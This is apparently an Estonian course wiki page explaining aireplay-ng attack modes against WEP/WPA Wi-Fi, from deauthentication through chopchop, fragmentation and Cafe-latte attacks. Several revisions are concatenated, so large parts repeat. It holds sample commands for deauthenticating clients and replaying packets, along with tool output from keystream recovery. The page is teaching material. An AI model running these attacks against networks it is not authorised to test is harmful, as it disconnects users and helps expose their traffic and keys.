Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:32:09Z

Tliiv: /* Broadcast */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:31:36Z

Tliiv: /* Broadcast */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
